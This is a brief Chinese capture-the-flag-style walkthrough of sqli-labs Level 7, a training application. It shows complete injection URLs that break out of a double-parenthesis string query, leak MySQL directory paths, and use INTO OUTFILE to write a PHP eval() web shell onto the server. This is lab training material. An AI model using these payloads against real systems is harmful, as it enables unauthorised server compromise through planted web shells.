sqli-labs系列——第七关（GET字符型注入导出shell）

判断注入

这里可以看出是字符型注入

http://1.1.1.130:86/Less-7/index.php?id=1%27%20and%20%271%27=%271

去源码里看一下，原来是加了两个括号

测试注入，这里提示导出文件：

http://1.1.1.130:86/Less-7/index.php?id=1%27))%23

爆绝对路径

这里因为不知道具体的绝对路径，所以返回第一关去看一下

http://1.1.1.130:86/Less-1/?id=-1%27%20union%20select%20null,@@datadir,@@basedir%20%23

开始注入

这就写入完毕了，这里被火绒杀了，就不连接了

http://1.1.1.130:86/Less-7/index.php?id=1%27))%20union%20select%20null,null,%27%3C?php%20@eval($_POST[123]);?%3E%27%20into%20outfile%20%22C:\inetpub\target\sqlilabs\Less-7\shell.php%22%20%23